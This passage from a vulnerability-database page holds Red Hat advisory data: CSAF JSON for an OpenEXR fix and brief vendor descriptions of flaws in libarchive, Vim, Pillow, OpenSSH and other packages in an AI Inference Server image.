"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.i686",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.i686",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.i686",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.i686",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.i686",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-0:2.2.0-12.el8_10.1.src",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.i686",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.i686",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.s390x",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.i686",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.s390x",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.i686",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.s390x",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.i686",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8863"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-0:2.2.0-12.el8_10.1.src",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.i686",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.i686",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.i686",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.i686",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.i686",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-0:2.2.0-12.el8_10.1.src",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.i686",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.i686",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.s390x",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.i686",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.s390x",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.i686",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.s390x",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.i686",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-0:2.2.0-12.el8_10.1.src",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.i686",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.i686",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.i686",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.i686",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.i686",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-0:2.2.0-12.el8_10.1.src",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.i686",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debuginfo-0:2.2.0-12.el8_10.1.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.i686",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.s390x",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-debugsource-0:2.2.0-12.el8_10.1.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.i686",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.s390x",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-devel-0:2.2.0-12.el8_10.1.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.i686",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.s390x",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-0:2.2.0-12.el8_10.1.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.i686",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.s390x",
"CRB-8.10.0.Z.MAIN.EUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_10.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing"
}
]
}
RHSA-2026:16009
Vulnerability from csaf_redhat - Published: 2026-05-11 14:14 - Updated: 2026-05-14 22:36A flaw was found in libxslt package. Processing web content may disclose sensitive information. This issue was addressed with improved memory handling.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64 | — |
Vendor Fix
fix
|
A flaw was found in GnuTLS. This vulnerability allows a denial of service (DoS) by excessive CPU (Central Processing Unit) and memory consumption via specially crafted malicious certificates containing a large number of name constraints and subject alternative names (SANs).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64 | — |
Vendor Fix
fix
|
A flaw was found in the OpenSSH GSSAPI (Generic Security Service Application Program Interface) delta patches, as included in various Linux distributions. A remote attacker could exploit this by sending an unexpected GSSAPI message type during the key exchange process. This occurs because the `sshpkt_disconnect()` function, when called on an error, does not properly terminate the process, leading to the continued execution of the program with uninitialized connection variables. Accessing these uninitialized variables can lead to undefined behavior, potentially resulting in information disclosure or a denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was identified in the RAR5 archive decompression logic of the libarchive library, specifically within the archive_read_data() processing path. When a specially crafted RAR5 archive is processed, the decompression routine may enter a state where internal logic prevents forward progress. This condition results in an infinite loop that continuously consumes CPU resources. Because the archive passes checksum validation and appears structurally valid, affected applications cannot detect the issue before processing. This can allow attackers to cause persistent denial-of-service conditions in services that automatically process archives.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in libarchive. This heap out-of-bounds read vulnerability exists in the RAR archive processing logic due to improper validation of the LZSS sliding window size after transitions between compression methods. A remote attacker can exploit this by providing a specially crafted RAR archive, leading to the disclosure of sensitive heap memory information without requiring authentication or user interaction.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in Python. The `webbrowser.open()` API, used to launch web browsers, does not properly sanitize input. This allows a remote attacker to craft a malicious URL containing leading dashes. When such a URL is opened, certain web browsers may interpret these dashes as command-line options, which could lead to unexpected behavior, information disclosure, or potentially arbitrary code execution, impacting the integrity of the system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in libarchive. On 32-bit systems, an integer overflow vulnerability exists in the zisofs block pointer allocation logic. A remote attacker can exploit this by providing a specially crafted ISO9660 image, which can lead to a heap buffer overflow. This could potentially allow for arbitrary code execution on the affected system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in the gdk-pixbuf library. This heap-based buffer overflow vulnerability occurs in the JPEG image loader due to improper validation of color component counts when processing a specially crafted JPEG image. A remote attacker can exploit this flaw without user interaction, for example, via thumbnail generation. Successful exploitation leads to application crashes and denial of service (DoS) conditions.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in giflib. This double-free vulnerability, caused by a shallow copy in GifMakeSavedImage and incorrect error handling, may allow an attacker to corrupt memory. While difficult to trigger, successful exploitation could potentially lead to arbitrary code execution or a denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in Vim, an open source, command line text editor. This heap buffer overflow vulnerability exists in the tag file resolution logic when processing the 'helpfile' option. A local user could exploit this by providing a specially crafted 'helpfile' option value, leading to a heap buffer overflow. This could result in arbitrary code execution or a denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in cbor2, a library for encoding and decoding Concise Binary Object Representation (CBOR) data. A remote attacker can exploit this vulnerability by sending a specially crafted CBOR payload containing deeply nested structures. This can cause the application to crash due to uncontrolled recursion, leading to a complete Denial of Service (DoS) for the affected application.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64 | — |
Vendor Fix
fix
|
A flaw was found in nghttp2. Due to missing internal state validation, the library continues to process incoming data even after a session has been terminated. A remote attacker could exploit this by sending a specially crafted HTTP/2 frame, leading to an assertion failure and a denial of service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64 | — |
Vendor Fix
fix
|
A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in Vim, an open-source command-line text editor. Specifically, an operating system (OS) command injection vulnerability exists in the `netrw` standard plugin. A remote attacker could exploit this by tricking a user into opening a specially crafted URL, such as one using the `scp://` protocol handler. Successful exploitation allows the attacker to execute arbitrary shell commands with the same privileges as the Vim process, leading to potential system compromise.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in Vim. This vulnerability, a heap-buffer-overflow and a segmentation fault, exists in the swap file recovery logic. A local attacker could exploit this by providing a specially crafted swap file. This could lead to a denial of service (DoS) or potentially information disclosure.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64 | — |
Vendor Fix
fix
Workaround
|
An unbounded recursion flaw has been discovered in the pypi pyasn1 library. This uncontrolled recursion occurs when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing nested SEQUENCE (0x30) or SET (0x31) tags with Indefinite Length (0x80) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a RecursionError or consumes all available memory (OOM), crashing the host application.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in Vim. By including a newline character in a pattern passed to Vim's glob() function, an attacker may be able to execute arbitrary shell commands. This command injection vulnerability allows for arbitrary code execution, depending on the user's shell settings.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64 | — |
Vendor Fix
fix
|
A flaw was found in Pillow, a Python imaging library. This vulnerability allows a remote attacker to trigger a denial of service (DoS) by providing a specially crafted FITS image file. The library's failure to limit the amount of GZIP-compressed data during decoding can lead to unbounded memory consumption, causing the system to crash or experience severe performance issues.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in Pillow, a Python imaging library. A malicious actor could exploit this vulnerability by providing specially crafted nested lists as coordinates to image processing APIs within Pillow. This could lead to a heap buffer overflow, potentially causing a denial of service in applications using the library.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64 | — |
Vendor Fix
fix
|
A flaw was found in Pillow, a Python imaging library. A remote attacker could supply a specially crafted malicious PDF file, causing the application to hang indefinitely and consume 100% CPU. This vulnerability leads to a Denial of Service (DoS), making the application unresponsive.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/vllm-rocm-rhel9@sha256:da9b415acbfa49de5960e3d255a1ba0ffad6d0bf67ec1272b1ff70842e819629_amd64 | — |
Vendor Fix
fix
|
{
"document": {
"aggregate_severity": {
